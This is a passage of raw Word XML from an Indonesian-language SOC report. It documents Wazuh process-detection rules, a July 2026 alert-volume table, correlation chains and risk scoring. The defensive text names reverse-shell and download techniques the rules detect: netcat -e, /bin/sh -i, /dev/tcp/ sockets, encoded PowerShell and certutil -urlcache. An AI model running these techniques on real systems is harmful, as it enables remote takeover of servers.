      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">: Pengeksekusian utilitas Netcat tradisional dengan flag </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>-e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> untuk mengekspor interactive shell ke koneksi remote.</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100104 mendeteksi terciptanya koneksi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A202C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Reverse Shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>. Dalam arsitektur jaringan enterprise, firewall perimeter biasanya memblokir koneksi masuk (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>inbound</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>), namun mengizinkan koneksi keluar (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>outbound</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>). Penyerang mengeksploitasi celah ini dengan memaksa server korban menghubungi komputer penyerang di luar (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>reverse connection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">) dan menyerahkan kendali terminal </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/bin/bash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">. Rule ini langsung menetapkan status darurat tertinggi: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A202C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Level 10 (Critical Priority P0)</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keberhasilan serangan eksploitasi web (Web Application Compromise) yang berhasil bertransformasi menjadi penguasaan sistem operasi (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>OS Level Access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Memasukkan tiket insiden langsung ke antrean darurat </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A202C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>P0 (SLA Penanganan &lt; 15 Menit)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> pada antrean triage analis SOC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>3. Mengidentifikasi alamat IP Command and Control (C2 Server) penyerang yang menerima soket jaringan tersebut.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>D. Alasan Pembuatan &amp; Pembuktian Empiris Juli 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A202C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Kaitan Erat dengan Rule 31110 (PHP CGI-bin RCE Exploit — 396 alert | TP 100,0%):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Referensi Dokumen:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>docs/laporan FP_TP/31110.docx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Temuan Forensik:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pada bulan Juli 2026, tercatat 396 serangan eksploitasi aktif CVE-2024-4577 pada server web PHP. Pola serangan RCE ini berusaha menginjeksikan perintah shell interaktif (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/bin/sh -i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> atau soket </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/dev/tcp/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>) agar penyerang mendapatkan terminal kendali permanen pada server target.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>• Jika server web berhasil dibobol dan mengeksekusi shell interaktif, Rule 100104 akan langsung menangkap proses tersebut dalam waktu kurang dari 1 detik.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A202C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Rasional:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Terciptanya Reverse Shell adalah garis batas antara </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>upaya penyerangan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>attempted attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">) dengan </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>keberhasilan pembobolan total</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>active full compromise</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>). Rule 100104 memastikan tim SOC langsung menerima sinyal darurat seketika saat shell interaktif pertama kali tercipta di server perusahaan.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="CBD5E0"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1B365D"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>BAGIAN 3: MATRIKS DISTRIBUSI EMPIRIS TELEMETRI PROSES (JULI 2026)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Berikut adalah pemetaan bagaimana kategori eksekusi proses pada dokumen sensus telemetri Juli 2026 berinteraksi dengan modul deteksi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>020-process.xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w: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290"/>
        <w:gridCol w:w="1290"/>
        <w:gridCol w:w="1290"/>
        <w:gridCol w:w="1290"/>
        <w:gridCol w:w="1290"/>
        <w:gridCol w:w="1290"/>
        <w:gridCol w:w="1290"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>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Rule ID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Deskripsi Signature Bawaan</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Level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Volume (Juli 2026)</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 Total SIEM</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Status Empiris</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Korelasi dengan Modul `020-process`</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52002</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Apparmor DENIED (ptrace syscall)</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457.198</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54,40%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(dockerd ps)</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Diisolasi di Rule 100003 agar tidak membanjiri modul proses</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52004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Apparmor DENIED mknod operation</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L4</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278</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0,03%</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(container)</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Diisolasi di Rule 100003 agar tidak mengaburkan anomali proses</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31110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PHP CGI-bin vulnerability attempt</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L6</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396</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0,05%</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TP (RCE CVE-2024)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Pemicu hulu yang berupaya mengeksekusi </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="1A202C"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Rule 100104 (Shell)</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5402</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Successful sudo to ROOT executed</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364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(Admin Sah)</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Pemantauan eksekusi biner administratif</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High Log Volume Burst Statistics</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L4</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(Telemetry surge)</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Pemantauan anomali volume proses sistem</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Endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>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Sysmon / Auditd Process Telemetry</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L7-L10</w:t>
            </w:r>
          </w:p>
        </w:tc>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Live Sensor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1290"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F7FAFC"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="264" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Active EDR</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True Positive Focused</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Rule 100100 s.d. 100104 (EDR Detection Layer)</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4: INTEGRASI PIPELINE KORELASI HILIR &amp; DYNAMIC RISK SCORING</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Modul </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>020-process.xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> terintegrasi secara mendalam dengan modul korelasi tingkat lanjut pada [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>070-correlation.xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>](file:///c:/Users/Pongo/Downloads/wazuh%20alert%20grouping%20-/ruleset/rules/070-correlation.xml) dan engine penilaian risiko:</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MULTI-STAGE ATTACK CHAIN RECONSTRUCTION (CORR-003 &amp; CORR-005)                      │</w:t>
              <w:br/>
              <w:t>└─────────────────────────────────────────────────────────────────────────────────────────────────┘</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">  SKENARIO CORR-003: Suspicious PowerShell Chain (Level 14 - Priority P0)</w:t>
              <w:br/>
              <w:t xml:space="preserve"> ┌───────────────────────────────┐            ┌───────────────────────────────┐</w:t>
              <w:br/>
              <w:t xml:space="preserve"> │ Rule 100100 (Encoded PS)      │            │ Rule 100101 (LOLBAS Download) │</w:t>
              <w:br/>
              <w:t xml:space="preserve"> │ Eksekusi powershell.exe -enc  │ ─────────&gt; │ certutil -urlcache / curl     │</w:t>
              <w:br/>
              <w:t xml:space="preserve"> │ Jendela Waktu 600 detik (10m) │            │ Host &amp; Akun Pengguna Sama     │</w:t>
              <w:br/>
              <w:t xml:space="preserve"> └───────────────────────────────┘            └───────────────────────────────┘</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                                             │</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                                             ▼</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                              ┌───────────────────────────────┐</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                              │ CORR-003 (Skenario Korelasi)  │</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                              │ LEVEL 14 (CRITICAL - P0)      │</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                              │ Target Penanganan SLA &lt; 15 m  │</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                              └───────────────────────────────┘</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">  SKENARIO CORR-005: Web Exploit to Shell Burst (Level 14 - Priority P0)</w:t>
              <w:br/>
              <w:t xml:space="preserve"> ┌───────────────────────────────┐            ┌───────────────────────────────┐</w:t>
              <w:br/>
              <w:t xml:space="preserve"> │ Rule 31110 / Grup "web"       │            │ Rule 100104 (Reverse Shell)   │</w:t>
              <w:br/>
              <w:t xml:space="preserve"> │ Serangan RCE / Webshell Probe │ ─────────&gt; │ Eksekusi /bin/bash interaktif │</w:t>
              <w:br/>
              <w:t xml:space="preserve"> │ Jendela Waktu 300 detik (5m)  │            │ Host Korban Sama (same_agent) │</w:t>
              <w:br/>
              <w:t xml:space="preserve"> └───────────────────────────────┘            └───────────────────────────────┘</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                                             │</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                                             ▼</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                              ┌───────────────────────────────┐</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                              │ Rule 107005 (070-correlation) │</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                              │ LEVEL 14 (CRITICAL - P0)      │</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                              │ "Web attack resulted in shell"│</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                              └───────────────────────────────┘</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2B6CB0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Mekanisme Penilaian Risiko Dinamis (*Dynamic Risk Score*):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Setiap kali salah satu rule di </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>020-process.xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> terpicu, engine kalkulasi risiko secara instan menginjeksi parameter skor:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A202C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Detection Severity Weight:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> +20 hingga +25 poin (Tergantung level rule 7 s.d. 10).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A202C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Behavioral Confidence:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> +20 poin (Karena menggunakan regex spesifik pada command-line, menghasilkan rasio false positive yang sangat rendah).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A202C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Chain Stages Bonus:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> +5 poin per tahapan korelasi yang terverifikasi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A202C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Hasil Akhir:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Setiap deteksi Reverse Shell (Rule 100104) atau Penghapusan Shadow Copy (Rule 100102) akan menghasilkan skor risiko di atas </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A202C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>85 poin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, otomatis mengalokasikannya ke antrean darurat </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A202C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>P0 (Critical SLA &lt; 15 Menit)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> pada antrean triage analis SOC (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>soc_ops.soc_triage_queue</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spacing w:after="40" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A202C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Integrasi Telemetri Sysmon &amp; Auditd:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Agar modul </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>020-process.xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
